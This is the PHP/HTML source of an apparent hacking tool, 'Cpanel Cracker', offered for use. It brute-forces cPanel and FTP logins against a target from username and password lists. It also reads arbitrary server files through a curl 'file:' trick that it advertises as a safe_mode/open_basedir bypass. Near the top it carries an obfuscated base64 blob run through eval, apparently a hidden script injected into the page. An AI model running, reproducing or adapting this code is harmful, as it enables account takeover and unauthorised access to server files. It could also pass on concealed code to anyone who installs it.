Cpanel_Craxer

1. <html>
2. <head>
3. <meta http-equiv="Content-Language" content="en-us">
4. </head>
5. <title>Cpanel Cracker Edited by Afghan Assassin</title>
6. <style>
7. body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
8. input,
9. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
10. button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
11. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
12. a:active { outline: none; }
13. a:focus { -moz-outline-style: none; }
14. </style>
15. <style type='text/css'>
16. <!--
17. A:link {text-decoration: none; color:#cccccc }
18. A:visited {text-decoration: none; color:#cccccc }
19. a:hover {text-decoration: none; color:#000000}
20. -->
21. </style>
22. <?php
23. @ini_set('memory_limit', 1000000000000);
24. $connect_timeout=5;
25. @set_time_limit(0);
26. $submit = $_REQUEST['submit'];
27. $users = $_REQUEST['users'];
28. $pass = $_REQUEST['passwords'];
29. $target = $_REQUEST['target'];
30. $option = $_REQUEST['option'];
31. $page = $_GET['page'];
32.  
33. if($target == ''){
34. $target = 'localhost';
35. $_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));}?>
36. <?php
37. print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
38. <br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>";
39. if ( $page == 'bio' ){
40. print
41. "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
42. <br><b>Please enter your USERNAME and PASSWORD to logon<br>
43. user<br>
44. 220 +ok<br>
45. pass ********<br>
46. 220 +ok login successful<br>
47. [ user@alturks.com ]# info<b><br><font face=tahoma><br>
48. <font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
49. Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
50. Our website , <a href='http://alturks.com'> http://alturks.com</a><br>
51. </center><br></td></tr></table>";
52. }elseif( $page == 'crack'){
53.  
54. @ini_set('memory_limit', 1000000000000);
55. $connect_timeout=5;
56. @set_time_limit(0);
57. $submit = $_REQUEST['submit'];
58. $users = $_REQUEST['users'];
59. $pass = $_REQUEST['passwords'];
60. $target = $_REQUEST['target'];
61. $option = $_REQUEST['option'];
62. if($target == ''){
63. $target = 'localhost';
64. }
65. print " <div align='center'>
66. <form method='post' style='border: 1px solid #000000'><br><br>
67. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
68. <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
69. <div align='center'><br>
70. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
71. <tr>
72. <td align='center'>
73. <b>Username</b></td>
74. <td>
75. <p align='center'>
76. <b>Password</b></td>
77. </tr>
78. </table>
79. <p align='center'>
80. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
81. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br>
82. <br>
83. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
84. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
85. </td></tr></table></td></tr></form><p align= 'left'>";
86. ?>
87. <?php
88. function ftp_check($host,$user,$pass,$timeout){
89. $ch = curl_init();
90. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
91. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
92. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
93. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
94. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
95. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
96. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
97. $data = curl_exec($ch);
98. if ( curl_errno($ch) == 28 ) {
99.  
100. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
101. exit;}
102.  
103. elseif ( curl_errno($ch) == 0 ){
104.  
105. print
106. "<b>[ user@alturks.com ]# </b>
107. <b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
108. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
109.  
110. function cpanel_check($host,$user,$pass,$timeout){
111. $ch = curl_init();
112. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
113. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
114. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
115. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
116. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
117. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
118. $data = curl_exec($ch);
119. if ( curl_errno($ch) == 28 ) {
120. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
121. exit;}
122. elseif ( curl_errno($ch) == 0 ){
123.  
124. print
125. "<b>[ user@alturks.com ]# </b>
126. <b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
127. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
128.  
129. if(isset($submit) && !empty($submit)){
130.  
131. $userlist = explode ("\n" , $users );
132. $passlist = explode ("\n" , $pass );
133. print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
134. foreach ($userlist as $user) {
135. $_user = trim($user);
136. foreach ($passlist as $password ) {
137. $_pass = trim($password);
138. if($option == "ftp"){
139. ftp_check($target,$_user,$_pass,$connect_timeout);
140. }
141. if ($option == "cpanel")
142. {
143. cpanel_check($target,$_user,$_pass,$connect_timeout);
144. }
145. }
146. }
147. }
148. }elseif ( $page == 'users'){
149. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
150. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
151. $file = $_POST['file'];
152. $level=0;
153. if(!file_exists("file:"))
154. @mkdir("file:");
155. @chdir("file:");
156. $level++;
157.  
158. $hardstyle = @explode("/", $file);
159.  
160. for($a=0;$a<count($hardstyle);$a++){
161. if(!empty($hardstyle[$a])){
162. if(!file_exists($hardstyle[$a]))
163. @mkdir($hardstyle[$a]);
164. @chdir($hardstyle[$a]);
165. $level++;
166. }
167. }
168. while($level--) chdir("..");
169. $ch = curl_init();
170. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
171. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
172. if(FALSE==curl_exec($ch))
173. die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
174. echo ' </textarea> </FONT>';
175. curl_close($ch);
176. print '</table>';
177. }
178. ?>